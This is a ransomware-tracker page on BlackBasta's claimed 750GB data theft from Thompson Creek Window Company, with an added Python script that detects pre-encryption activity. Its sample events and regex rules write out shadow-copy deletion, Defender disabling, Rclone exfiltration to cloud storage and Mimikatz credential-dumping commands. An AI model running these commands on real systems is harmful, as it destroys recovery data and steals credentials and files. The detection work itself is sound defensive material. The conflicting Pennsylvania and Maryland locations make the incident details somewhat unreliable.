Thompson Creek Window Company Hit by BlackBasta Ransomware, 750GB Data Breach

Incident Date: July 15, 2024

Overview

Title: Thompson Creek Window Company Hit by BlackBasta Ransomware, 750GB Data Breach
Victim: Thompson Creek Window Company
Attacker: BlackBasta
Location: Norristown, Pennsylvania, USA
First Reported: July 15, 2024


Company Overview

Thompson Creek Window Company, based in Lanham, Maryland, is a prominent home improvement firm specializing in the manufacturing and installation of replacement windows, doors, gutters, siding, and roofing. Established in 1980, the company has built a reputation for providing high-quality products and services tailored to enhance the aesthetic appeal and value of homes. The company employs a substantial workforce and is recognized for its commitment to customer satisfaction and innovation in home improvement solutions.

Attack Overview

Thompson Creek Window Company has been listed as a victim of the BlackBasta ransomware group. The group claims to have exfiltrated roughly 750GB of data before encryption. According to the listing, the stolen material spans corporate, financial and accounting records; human resources data including hiring files, payroll records, personal tax forms and various agreements; and personal documents belonging to both employees and clients. A breach of this scope creates two distinct exposures: operational disruption for the company if encrypted systems cannot be restored, and privacy and fraud risk for every employee and customer whose tax forms and personal documents are in the leaked set, whether or not a ransom is paid.

About BlackBasta Ransomware Group

BlackBasta is a ransomware operator and Ransomware-as-a-Service (RaaS) criminal enterprise that emerged in early 2022. The group is believed to have connections to the defunct Conti threat actor group due to similarities in their approach to malware development, leak sites, and communications for negotiation, payment, and data recovery. BlackBasta targets organizations in the US, Japan, Canada, the United Kingdom, Australia, and New Zealand in highly targeted attacks. They employ a double extortion tactic, encrypting their victim’s critical data and vital servers and threatening to publish sensitive data on their public leak site if the ransom is not paid.

Penetration and Vulnerabilities

BlackBasta gains initial access through spear-phishing campaigns (historically delivering the QakBot loader), network access purchased from initial access brokers, and insider information. Once inside, affiliates harvest credentials with Mimikatz, exploit known vulnerabilities to escalate privileges, and move laterally across the domain. Command and control and persistence rely on Cobalt Strike Beacons and the SystemBC proxy, while Rclone is used to push stolen data to attacker-controlled cloud storage. Immediately before deploying the encryptor, the group maximizes its leverage by disabling security tools, deleting Volume Shadow Copies so systems cannot be rolled back locally, and completing exfiltration of sensitive data to support double extortion.
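The pre-encryption behaviours just described are the ones a defender has the best chance of catching, because each leaves a distinctive command line in process-creation telemetry. Below is an added detection sweep written for this page; it is not code from the original page or from the RRA site. It assumes a simplified process-creation event shape (the timestamp, host, user, image and command-line fields of Sysmon Event ID 1 or Security 4688), the sample events are constructed for the demo, and the command-line indicators are the widely published ones for these techniques rather than anything recovered from the Thompson Creek incident.

```python
"""Sweep Windows process-creation events for BlackBasta-style pre-encryption
activity: shadow-copy deletion, security tool tampering, Rclone exfiltration
and Mimikatz credential dumping.

Added example, not code from the page or the RRA site. The event fields and
the sample events below are assumptions constructed for the demo.
"""
import re
from typing import Dict, List

# Each rule: (name, MITRE ATT&CK technique ID, regex over the command line).
RULES = [
    ("shadow_copy_deletion", "T1490",
     re.compile(r"(vssadmin(\.exe)?\s+delete\s+shadows"
                r"|wmic(\.exe)?\s+shadowcopy\s+delete"
                r"|bcdedit(\.exe)?\s+/set\s+\S+\s+recoveryenabled\s+no)", re.I)),
    ("defender_tampering", "T1562.001",
     re.compile(r"Set-MpPreference\s+-Disable\w+|sc(\.exe)?\s+(stop|config)\s+WinDefend", re.I)),
    ("rclone_cloud_exfil", "T1567.002",
     re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)),
    ("mimikatz_cred_dump", "T1003.001",
     re.compile(r"sekurlsa::logonpasswords|lsadump::|privilege::debug", re.I)),
]

# Constructed sample events (not real telemetry). The last one is a benign
# vssadmin invocation included to show the rules do not fire on listing.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ts": "2024-07-14T02:11:05Z", "host": "FILESRV01", "user": "CORP\\svc_backup",
     "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2024-07-14T02:11:09Z", "host": "FILESRV01", "user": "CORP\\svc_backup",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -nop -c \"Set-MpPreference -DisableRealtimeMonitoring $true\""},
    {"ts": "2024-07-14T02:30:41Z", "host": "WKS-ACCT07", "user": "CORP\\jdoe",
     "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\rclone.exe",
     "cmdline": "rclone.exe copy \\\\FILESRV01\\Finance mega:dump --transfers 8 -q"},
    {"ts": "2024-07-14T02:35:02Z", "host": "DC01", "user": "CORP\\admin",
     "image": "C:\\ProgramData\\m.exe",
     "cmdline": "m.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit"},
    {"ts": "2024-07-14T08:00:00Z", "host": "WKS-ACCT07", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},
]


def scan_events(events):
    """Return one hit per (event, rule) match with enough context to triage."""
    hits = []
    for ev in events:
        for name, technique, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                hits.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "rule": name, "technique": technique,
                             "cmdline": ev["cmdline"]})
    return hits


def summarize(hits):
    """Group hits per host in time order so the kill-chain shape is visible."""
    by_host = {}
    for h in sorted(hits, key=lambda h: h["ts"]):
        by_host.setdefault(h["host"], []).append((h["ts"], h["rule"], h["technique"]))
    return by_host


if __name__ == "__main__":
    for host, seq in summarize(scan_events(SAMPLE_EVENTS)).items():
        print(host)
        for ts, rule, tech in seq:
            print(f"  {ts}  {rule:<24} {tech}")
```

The per-host ordering matters more than any single rule: a shadow-copy deletion followed seconds later by Defender being switched off on the same file server is the signature of an encryptor about to run, and is the point at which isolating that host still limits damage. The benign `vssadmin list shadows` event is there deliberately; rules that key on the binary name alone rather than the `delete` verb generate noise from backup software and get tuned out.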

Sources

Recent Ransomware Attacks

The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing near real-time tracking of ransomware attacks, the groups behind them and their victims. Given threat actors' lucrative success so far, ransomware has become the most widespread and the most financially and informationally damaging cyber threat to businesses and organizations today.

The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.